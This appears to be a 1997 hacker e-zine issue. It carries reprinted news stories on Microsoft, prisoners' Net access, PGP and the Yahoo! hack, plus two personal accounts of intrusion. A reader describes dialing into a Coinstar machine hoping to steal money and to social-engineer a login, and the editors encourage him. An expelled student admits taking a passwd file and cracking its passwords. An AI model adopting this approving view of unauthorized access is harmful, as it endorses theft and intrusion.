hello..... my nick is sandspidr. i am relatively new to the hacking scene but am learning rapidly. but anyways, here is something i thought would interest u. the other day while i was shopping at Giant Eagle, i noticed this lame ass waste of space machine called coinstar. i was looking at it (trying to find a way to steal money) when i noticed a fone line running into the machine. i came back later in the day with a phone and ani'ed the number. so i went home and dialed in with my modem. the system is QNX systems.
i havent done a thorough investigation on the system. i am looking for a service number to see if i can find an idiot to give me the login and password. more later.....if u want
sandspider
bbrains@hotmail.com

[ Sounds cool, keep us informed. ]

---

I found that article 9 is very very true. We are being monopolized and manipulated. Though I'm not a hacker but just a simple person who had no choice but to comply with large corporate manufactured software. Shit I hate this.

[ Down with Big Brother! ]

[The News...........................................................KungFuFox]

1 : Suggestion to Bill Gates for a Microsoft Christmas
2 : Twice Removed: Locked Up and Barred from Net
3 : Pretty Good Privacy Not Looking So Great
4 : Sixth Coming
5 : Hackers break into Yahoo!, call for release of Mitnick

_____________________________________________________________

Suggestion to Bill Gates for a Microsoft Christmas
by Jon Katz

25.Nov.97 -- Dear Mr. Gates,

Christmas comes but once a year, and it's never too early to start tackling that holiday shopping list. Yours could be a whopper.

I know you're buying some neat stuff for yourself: that gazillion-dollar Tomorrowland near Redmond, Michelangelo's old notebooks, Napoleonic bric-a-brac, and a US$21 million jet you just paid for out of your pocket, you lean and mean little corporate devil.

But you do have $40 billion in the bank, and before you order that futuristic new yacht, please take a few seconds to consider an idea I had in the middle of the night. This idea would do you worlds of good. It would establish Microsoft world domination once and for all, and justifiably so. The beleaguered folks at Netscape would run up the white flag. Those pesky bureaucrats at the Justice Department would soon be scurrying for cover, and you'd spark yet another - the biggest ever - wave of Gates-is-amazing hype in the media.

This could be big.
It would demonstrate that you are, in fact, a true visionary, and show the amazing power of new kinds of companies like yours to shape the world for the better.

Listen, I know you're not exactly up nights worrying about people like me - gnats on the elephant's butt - but this would also have the added effect of shutting me and my ilk up for good. In some quarters, like my house, that would be seen as no small miracle.

Here's the idea: Wire each and every classroom in America.

Various estimates, from private companies to the Commerce Department, have put the price tag of wiring up all the United States' schools properly at anywhere between $5 billion and $9 billion, depending on how lavishly and comprehensively it's done. The usual model is five computers to a classroom, plus the software, staff, phone lines, maintenance, security, and space to use them properly.

The shocking thing about the low and high ends of these estimates is that you could write a check for either amount and still install those climate-controlling computer chips in every room of your new house. This could cost you as little as 10 percent of your worth or, at the most, 20 percent.

And think about it: Overnight, you could wipe out the gap between the technology haves and have-nots. You could virtually guarantee employment opportunities to a whole generation of kids being left behind, while journalists and politicians obsess about porn on the Net.

You would earn a knock-out place in history. You would show that the right company, managed in the right way with the right heart and vision, can be more effective in the digital age than the president of the United States and the vast bureaucracy he ostensibly leads. And do much more good in a short time than the US Congress does in any given generation.
While these people flap their gums about morality on the Internet, and warn about online perverts and militias, you could, all by yourself, address and eradicate in a couple of years the real moral issue facing Americans and new technology - making sure everybody has equal access to it.

In the urban underclass, for example, federal statistics show that only a tiny fraction of people own computers or have online access. The number isn't rising, either. These people are being condemned and sentenced to cultural and educational deprivation and economic disadvantage.

For all Mr. Clinton and Mr. Gore's technoblather about that bridge to the 21st century, Congress and the administration are much too busy posturing, scheming, fundraising, and devouring one another to do anything meaningful about getting many of us there.

You could give Americans one of their greatest Christmas presents ever. You could put computers in every classroom. For that matter, if you wanted to dig a little deeper, you could make sure every American kid who wants one has one.

You wouldn't even have to write one single check or lower your balance in one shot. A couple billion dollars a year for four or five years would do the trick. For that matter, you could set up some sort of fund and donate computers off the interest alone. Other corporations would perhaps compete with you to do similar acts of good, all in the interest of image-burning and market share.

Talk about vision and leadership! This would be a hummer of a Christmas gift. It would sure convince me you were a new kind of corporate leader and a hell of a nice guy to boot, as so many journalists have been writing. And nobody much would even dare to argue Microsoft was too powerful for the nation's good.

And, as I fiddle with my PowerBook's calculator, it would still leave you with about $30 billion, at least.

This could be a modern Christmas Carol. Thanks for listening. I'm sure I'll be hearing from you, one way or the other.
And happy holidays.

(c)1993-97 Wired Ventures, Inc.

_____________________________________________________________

Twice Removed: Locked Up and Barred from Net
by Steve Silberman

3.Dec.97 -- When US District Court Judge Sam Sparks sent Chris Lamprecht to the Federal Correctional Institution in Bastrop, Texas, in 1995, the 24-year-old hacker sobbed before the bench. A stint in the federal pen was terrifying enough, but the judge had tacked an unusual condition onto his 70-month sentence.

Though Lamprecht was being sent to Bastrop for money laundering - not the hacking that earned him the handle "Minor Threat" - Judge Sparks stipulated that Lamprecht was forbidden to access the Internet until 2003.

"I told the judge computers were my life," Lamprecht recalled.

Any case that involves computers and a boyish, fair-skinned defendant is bound to get press, but things have changed since Swing magazine billed Lamprecht as "the first person to be officially exiled from cyberspace." If the young hacker was the first to be exiled from the online world by law, he now has plenty of company, following the circulation of an internal memo at the Federal Bureau of Prisons last year, which set in stone a federal policy of keeping prisoners - and even many parolees - offline.

According to the federal view, logging on is simply incompatible with incarceration. As chief bureau spokesman Todd Craig states, in bureaucratese, "Access to the Internet is not a necessary tool for the correctional process" - which means that with more than 1.6 million people locked up in the United States alone, and thousands of parolees subject to similar restrictions even as they attempt to rejoin modern life, a significant population is being left behind by the network revolution.

What's at stake?
As more and more jobs are wired into the Net and the Web, the possibility that former offenders will be able to find employment after incarceration becomes more and more remote - which undermines the very bedrock of the correctional process, asserts Jenni Gainsborough, spokeswoman for the American Civil Liberties Union's National Prison Project.

"The aim of our prisons should be to release people who are able to reintegrate themselves into society," she explains. "But no politician wants to appear soft on crime. Nobody thinks about what's actually useful to reduce the recidivism rate."

A poster boy for keeping prisons unwired

Mention the words prisoner and Internet in a sentence, and the same object-lesson will come up over and over again: the case of George Chamberlain, a sex offender incarcerated at Lino Lakes state prison in Minnesota, who used his position as manager of computer services for a venture called Insight Inc. to download child pornography from the Net while sitting in jail.

Chamberlain was a poster boy for keeping prisoners as far away from a modem as possible. He not only siphoned 287 erotic images off the Net and encrypted them on an optical drive behind the pass phrase "They cannot commit me," he also compiled lists of thousands of children's names, and chitchatted with other pornographers through an anonymous remailer.

"The idea that a prisoner had this kind of access to the Internet and was able to collect explicit child pornography and communicate with others on how to hide it," US Attorney David Lillehaug declared last March, "is almost unbelievable."

The Chamberlain case seemed all too believable, however, given a statement issued by the US Parole Commission just three months earlier. The commission, "responding to increased criminal use of the Internet," approved "discretionary use of special conditions of parole that would impose tight restrictions on the use of computers by certain high-risk parolees."
A spokesperson for the Parole Commission declined to answer questions about the number of parolees currently subject to restrictions on computer use, which include a ban on encryption, screening of online activity by monitoring or blocking software, compulsory daily logging of all Web sites visited, and unannounced searches of drives and disks by parole officers.

Federal Bureau of Prisons spokesman Craig equates the ban on computer use by inmates to restrictions on use of the telephone. "They can make 15-minute calls to pre-approved numbers, like family and clergy," Craig says. It would be impossible, he says, to pre-approve forays into the online world in the same way.

In its press release, the commission said it acted "after noting the surge of 'how-to' information available on the Internet and other computer online services relating to such offenses as child molestation, hate crimes, and the illegal use of explosives."

"That's complete BS," charges Stanton McCandlish, program director for the Electronic Frontier Foundation. "There was no alarming increase in that kind of 'how-to' information on the Net. There was an increase in publicity about politicians like Dianne Feinstein, who used those fears as justification to limit use of the Internet."

McCandlish points out that last June's Reno v. ACLU decision by the Supreme Court sent a message that the court considers the Net as much subject to First Amendment speech protections as the printed word. Comparing broad prohibitions on the use of computers by prisoners and parolees to banning the act of writing by those in prison, McCandlish predicts that "the issue is going to heat up" in the coming year. The EFF is "waiting for a good, solid legal challenge" to arise before getting involved in a case, McCandlish says.
The world's best-kept secrets

A small California businessman named John Danes runs an outfit called Inmate.com, charging prisoners US$70 to design and maintain a personal homepage and an email address for three months. Each week, Danes prints out the incoming mail, peruses it for forbidden content like pornography or communication from minors, and forwards it to the inmates via snail mail.

At present, nearly 70 male prisoners and three women have homepages at Inmate.com. The majority of the inmates are black or Hispanic; several of the pages maintain the author's innocence; many are an invitation to romance.

Ironically, the ACLU's Gainsborough attributes some of the public's fear about convicted criminals having a gateway to the Net to the publicity given to Web sites like Inmate.com and Dead Man Talkin' - sites that are put up by friends of prisoners who do not themselves have access. "Serial-killer homepages and prisoner sites contribute to the public perception that there's a huge use of the Net by these people to advertise their evil ideas," Gainsborough says, while affirming her support for the right of prisoners to express themselves.

One page on the Inmate.com site asks, "Have you ever wondered what it's like to live in another world right here on Earth? What would you do if you suddenly fell from grace? Prisons hold some of the world's best-kept secrets."

Secrets are one thing, Gainsborough observes, that prisoners are not allowed to keep. "In many prisons, even [typewriters with built-in memory] are forbidden," she says. "There's always this fear of prisoners hiding this stuff away - so the idea of computers where people could really keep stuff hidden is very frightening."

In July 1996, a promising computer-training program at the Washington State Reformatory was terminated when it appeared that the prisoners were learning too much about computers - that is, more than prison officials knew.
Mike Williams, associate superintendent at the reformatory, was head of security for the program, which was a pilot for a statewide effort that would have allowed prisoners to learn how to use business software like Microsoft Excel, PowerPoint, and Word. "The inmates learned a lot of good stuff," Williams acknowledges. "They were able to learn a trade while in prison, so that they might have been actually able to get a job in that area when they got out. This was like real-world vocational training."

So why was the innovative program scrapped, rather than ported to every jailhouse in the state?

"Our superintendent thought it was a manageable pilot program," Williams recalls, "but the key figures who needed to approve it up in Olympia decided to put an end to it. We had inmates learning more about computers than we had staff time to keep an eye on them. We couldn't keep up with them."

The fear that prisoners would use encryption or other electronic means to cloak escape plans was a chief concern. "It was a cat-and-mouse game. We had to load the software for them, and there was no money allocated to hire more officers to do that kind of thing," Williams says.

Though at least one inmate claims that graduates of the program had landed good jobs upon release, state deputy director of prisons Jim Blodgett - one of the "key figures" in the state capital who decided to shut the gate on the pilot effort - told a reporter, "We couldn't see the value in keeping it. We had staff not knowing what was going on."

If the object of incarceration is to ensure that prisoners remain at least as ignorant of current technologies as untrained prison staff, the federal policy will be deemed a success.
But as the Net touches every area of our experience - from our most intimate relationships to our responsibilities as participants in a democratic society - more and more of those on the outside of the bars are coming to feel, with Lamprecht, that "computers are our lives," or are inextricably linked with our lives. And those on the inside are destined to be released into a life for which they are even more unprepared than former offenders were in the past.

(c)1993-97 Wired Ventures, Inc.

_____________________________________________________________

Pretty Good Privacy Not Looking So Great
by James Glave

3.Dec.97 -- Legendary cypherpunk and former PGP Inc. chief technology officer Phil Zimmermann is in the uncomfortable position of having to eat his words. Following Monday's US$35 million cash acquisition of PGP by Network Associates, the man who once testified before the Senate that key recovery could "strengthen the hand of a police state" now works for a company that actively promotes it.

Reaction from e-privacy activists was swift and harsh. "The users of PGP can no longer rely on the credibility of Phil Zimmermann to ensure that the product is everything that they've been promised it's been previously," said Dave Banisar, attorney for the Electronic Privacy Information Center and co-author of The Electronic Privacy Papers.

Network Associates, formerly known as McAfee Associates, is an active member of the Key Recovery Alliance, an organization that lobbies Congress for key recovery that would grant law enforcement agencies back-door access to private encrypted communications. Network Associates and other companies support key recovery because it would allow them to export strong crypto software without bothering to make a separate nonrecoverable version for the domestic market. The Commerce Department forbids export of the strongest available encryption without elaborate promises from manufacturers to develop key recovery features.
Thus many companies are forced to develop both export and domestic versions of their software, each with differing crypto strengths.

But Zimmermann, a pioneer of strong encryption, has spent years crusading against key recovery, calling it an invasion of privacy. And the most recent release of PGP's encryption software allows users to disable key recovery. "People should give their consent to use [recovery]," Zimmermann said. When asked whether future versions of the package will retain that option, Zimmermann replied, "Certainly, as long as I have anything to say about it."

Zimmermann's new title at Network Associates is "fellow," but he declined to comment on exactly what authority and responsibility that confers. Meanwhile, Phil Dunkelberger, PGP's former president and CEO, was named general manager of Network Associates' Total Network Security Division. "It's going to take some time to figure things out," said Zimmermann.

EPIC's Banisar was less diplomatic and postulated that Zimmermann's new title reflected a clash of values between him and Network Associates on key recovery. "We have a number of fellows here, and they are usually unpaid volunteers," Banisar said. "It will require a fundamental examination by human rights groups and others about whether any newer versions of PGP are truly trustworthy," said Banisar.

Network Associates could not be reached for comment.

(c)1993-97 Wired Ventures, Inc.

_____________________________________________________________

Sixth Coming
by Stephen Jacobs

1.Dec.97 -- The Commodore Amiga, dubbed "the world's first multimedia PC" by Byte, is back again. Developed by Hi-Toro, then sold to Commodore, the computer hit the streets in late 1985 and met its first public demise with the death of Commodore in 1994. Though the system disappeared from the mainstream, Amiga owners have kept the machine alive in a quasi-underground market.
Meanwhile, the German clone manufacturer that bought the OS promptly went bankrupt, and after two deals fell through sold the technology to Gateway 2000 last March. When Amiga Inc.'s Darreck Lisle subsequently began popping up in several user groups, predictions of another "second coming" including PDAs and set-top boxes based on the venerable OS spread quickly around the Net. Gateway did not respond to the buzz, choosing to keep quiet until DevCon, a gathering of professional developers at the Midwest Amiga Exposition in November. Even if this revival fails, the faithful know the Amiga still has several lives to go.

This article originally appeared in the December issue of Wired magazine. To subscribe to Wired magazine, send email to subscriptions@wired.com, or call +1 (800) SO WIRED.

(c)1993-97 Wired Ventures, Inc.

_____________________________________________________________

Hackers break into Yahoo!, call for release of Mitnick
December 9, 1997

NEW YORK (AP) -- Hackers broke into Yahoo!, the Internet's most popular site, demanding the release of an imprisoned comrade and threatening to unleash a crippling computer virus if he is not freed. Computer security experts were skeptical of the hackers' claim that they had implanted such a virus.

The hackers, calling themselves PANTS/HAGIS, got into Yahoo!'s World Wide Web site at about 10 p.m. Monday, leaving a digital ransom note.

"For the past month, anyone who has viewed Yahoo's page & used their search engine, now has a logic bomb/worm implanted deep within their computer," it read. "On Christmas Day, 1998, the logic bomb part of this 'virus' will become active, wreaking havoc upon the entire planet's networks.

"The virus can be stopped. But not by mortals."

The note said an "antidote" program will be made available if hacker Kevin Mitnick is released. Mitnick was indicted last year on charges involving a multimillion-dollar crime wave in cyberspace.
Diane Hunt, a spokeswoman for the company, said the message was up for only 10 to 15 minutes and a few thousand people saw it. "We immediately took action to see the extent of the damage and moved to correct it," she said. "And about that virus? There is, in fact, no virus."

Yahoo! is a computer directory widely used for searching the Internet. The note appeared briefly in place of the Yahoo! home page, preventing people online from using the search engine, which got 17.2 million visits in October.

Jonathan Wheat, manager of the Anti-Virus Lab at the National Computer Security Association, said it is at least theoretically possible to exploit security flaws on the Internet and implant such a virus. But he said he doubts this group of hackers -- already known to security experts -- pulled it off.

"That's pretty much ridiculous," agreed Jamonn Campbell, an information security analyst at the association.

Wheat said there was little reason to be concerned that the popular Web site was hacked. "A lot of Web sites get hacked constantly," he said. He said that while Yahoo! is a high-profile site and should be expected to have better security than most, "no site is completely hack-proof."

(c)1997 The Associated Press.

_____________________________________________________________

University Kills Students' Security Site
by Steve Silberman

Two University of Pittsburgh computer-science majors have been abruptly barred from accessing the Net by campus officials, physically banned from all the college's computing labs, ordered not to contact the staff member who shut down their access, and threatened with expulsion.

Their offense? Building a free online resource for those on the cutting edge of computer-security issues, the students say.

Last Friday, freshmen John Vranesevich and Rob Dailey found that the Ethernet connection in their dorm room had been disabled.
Assuming that their site, AntiOnline, was being subjected to a denial-of-service attack from some hacker targeting a site devoted to protecting others from malicious hacks, the two began the usual drill of reinstalling TCP/IP software and "pinging out" to verify their connection to the Net at large.

After working nearly all night, they found a message on their voice mail from Lee Bannister, coordinator of residential computer services at the university. Bannister's message: Their Ethernet access had been terminated for violations of Pitt's code of responsibility for use of on-campus computing resources.

Bannister also said AntiOnline violated rules prohibiting use of campus facilities "for purposes other than research or instructional purposes." The code also prohibits use of campus server space and bandwidth "for commercial purposes or commercial gain," and bans hacking or any activity that "interferes with the operation of the university's technical resources by deliberately attempting to degrade or disrupt resource performance, security, or administrative operation."

Vranesevich and Dailey assert that research and instruction were the very things they were offering at AntiOnline, which Vranesevich launched when he was in 10th grade. They also point out that AntiOnline was completely non-commercial, with no fees, no ads, and no banners. Content was closely monitored, Vranesevich says, to prevent posting of inappropriate materials such as porn or "warez" (which can include pirated software or cracking programs).

To those interested in computer-security issues, the site offered free Net access, email, and space on Vranesevich's server, Dailey said, in hopes that even the uninitiated could learn from the experts. "It was educational," Dailey said, "so that even people who were new to all this could learn to protect themselves."
AntiOnline was a crucial resource for Net security news, said "RLoxley," who operates the "hackphreak" channel on IRC and is the webmaster of another hackproofing resource, X-Treme. "If you wanted to know what the latest exploit [operating-system defect] was, and you wanted to patch it, you went to that site - bottom line," he said.

Vranesevich claimed that the hacker assaults on AntiOnline - which he admitted numbered in the "hundreds" - were no threat to the campus computing system as a whole. "They were smart attacks" aimed specifically at his site, "nothing that would degrade a network this size," Vranesevich explained. He also noted the campus network is heavily firewalled.

AntiOnline was one of the first sites to examine a security hole in the Windows operating system that surfaced in Spain as "Muerte" - ported into English as the infamous WinNuke bug.

Vranesevich was inspired to create a site devoted to security issues, he said, when a bank of NeXT computers at his high school in Beaver, Pennsylvania, was used as a telnet "bounce point" to gain access to a protected computer at NASA.

While still a sophomore in high school, Vranesevich and a friend negotiated with the Beaver Chamber of Commerce to, as he puts it, "get the whole town online." The two spun out Web pages for local merchants - netting themselves US$3,000 each for a summer's work - and schmoozed the town library and the Beaver Area School District into installing free machines in the library and free dialup access to the Net for local residents.

By the time Vranesevich got AntiOnline up and running in his tower room at the University of Pittsburgh, he said, it was a very popular site.

On Tuesday, Vranesevich and Dailey found an ISP willing to host a page about their plight, and the two posted Bannister's phone number and email address on the page, and on IRC, with a plea for statements of support.
Later that day, their email and shell accounts were shut down, their dialup access to the Net was cut off, and the two were informed that they would be subject to more serious charges, to be specified at a later date.

On Thursday morning, they received a "no-contact order" from the assistant vice-chancellor for student affairs, forbidding them from communicating with Bannister by email or phone, even "through any intermediary, including users of AntiOnline.com or other Internet users at large, or similar types of association." Should any such contact occur, the letter warned, the freshmen would be "subject to disciplinary sanctions up to and including dismissal from the university."

"They expect us to tell anyone who's ever been on AntiOnline to not email him," Vranesevich said, "when we have no access to the Internet whatsoever."

Bannister refused to talk to the press, but university director of communications Ken Service said that "it was felt that the use of the site was in violation of the policy" the students signed at the beginning of the semester. Service declined to discuss the details of the case, citing student confidentiality. But as to the further charges, Service said "the kindliest version of it is that they seemed to have been encouraging harassment" of Bannister by posting his email and phone number on the Net.

The case will go to the campus judicial board this afternoon. (11/21/97)

(c)1993-97 Wired Ventures, Inc.

_____________________________________________________________

Deprave Freshman at XXXXXX University Texas

Early September, Renee Moore, dean of student life, called me in regarding the computer system having problems, and it continually going down. She requested a meeting between me, her, and Matin, one of the heads of the computer systems department. They informed me that my login had been used during the incident as well as a couple of other people's.
I reminded them that I had constantly requested that my account be fixed because I was never able to log in. Through visits, in which I did sign in to the lab, I talked to deskworkers as well as the heads of Information Systems, requesting information regarding my account. I also had electronic communication with them through email. I had sent email through Tommy Newman's account with his permission. They never fixed it, so I went ahead and temporarily used my parents' America Online.

I volunteered my computer for their perusal to verify that my system was not used. They accepted and proceeded to search through it. Nothing was found in their search, and this was recorded in the "case's" record. After that meeting, Renee Moore requested another meeting so that we could discuss the findings and the facts. At this meeting, she disclosed to me that they had found no direct evidence that it had been me doing the damage. To the question, "Is this over with?", she responded, "Yes."

The next incident was at my school's computer lab. On this occasion, I had gone into the lab in order to visit a friend of mine named Anthony. The only time I touched the computer was to briefly look at a site that he showed me at Hotmail, plus a few other miscellaneous sites that I don't remember. He saw that I never once logged into the computer system and can verify that. After that, two student workers, not staff, came in and asked for my identification, saying, "C'mon Colin, we know what you were doing.......we had someone outside the building looking in from the window that had seen you doing something." When I asked them, "What is it that you think that I was doing?", they responded, "We don't know yet, but you know what you were doing, and if any damage was done, we will contact you." I said, "Fine. I wasn't doing anything, and you all know that if you were watching me." They told Renee Moore that they had to kick me out of the computer lab.
The fact is, and can be verified by witnesses, that I left approximately 15-20 minutes later on my own, and that I was never asked to leave. They never attempted to contact me. Instead, on Friday, December 12, 1996, three FBI agents, Mathew Grief (another dean of student life) and one of the people in Information Systems came into my room. The FBI agents had a search warrant that gave them the right to confiscate my computer and everything having to do with it. They never charged me with anything, and never read me my rights. After about 20 minutes of going through my personal belongings, they told me that they were going to ask me some questions. Their first question regarded the September incident. At that point, I did not answer and told them that I would prefer to have an attorney or some form of representation present. They said that that was fine and continued searching. The ordeal ended with their leaving with my possessions, stating that they would be in contact with me.

The final exchange took place in the office of Renee Moore. This involved her informing me that they had expelled me. When I asked her why the FBI had been called, she referred to the incident with the computer lab. She had been told that I was asked to leave, when I had not been. She told my parents on the phone that Jack had been called, which was true, he had been, but that he had been called and came and had talked to me. The computer lab people are having a problem sticking to one story and are telling different people different things.

Things on my computer:

passwd file: I got this from April, one of the desk workers, through her login and password when she said that she had been having problems logging into her email account.

cracked passwords: I ran a cracker on these in order to help her. The cracker does other accounts too by itself. I did not target any of them.

source code: I had this for my own reference. They cannot be used from Windows 95.
I do not have a LINUX partition, so these cannot be used locally. I had my programming books confiscated. I had been trying to learn some programming.

[Reader Survey..........................................................Staff]

[This survey is designed to help us better suit our magazine to the reader, or we may just be trying to get a good laugh, but we haven't decided yet.]

Nick:
M/F:
Age:
Occupation/grade:
City:
State/Province:
Zip Code:
Country:
Area Code:

Why do you read The HAVOC Technical Journal?
Where did you get this issue?
Are you a subscriber to THTJ?
What other zines do you read on a regular basis?
What would you like to see in future issues of THTJ?
What would you add or subtract from THTJ's format and articles?
On a scale of 1-10 (1 being lowest, 10 being highest), how would you rate The HAVOC Technical Journal?
Any extra comments?

Please send all replies to scud@thtj.com

+----------------------------+
| [ ] Do not check this box! |
+----------------------------+

For office use only: [ ]D [ ]X [ ]W [ ]Y [ ]0 [ ]1 [ ]0 [ ]1
(don't ask, we don't have a clue what this is for)

[Fin....................................................................scud_]

Well, once again thank you for reading this fine issue of thtj. Tune in next month, same bat time, same bat channel! While you are waiting to read the next issue, why don't you send us some mail, or fill out the reader survey, or better yet, write an article for thtj?

scud_ <scud@thtj.com>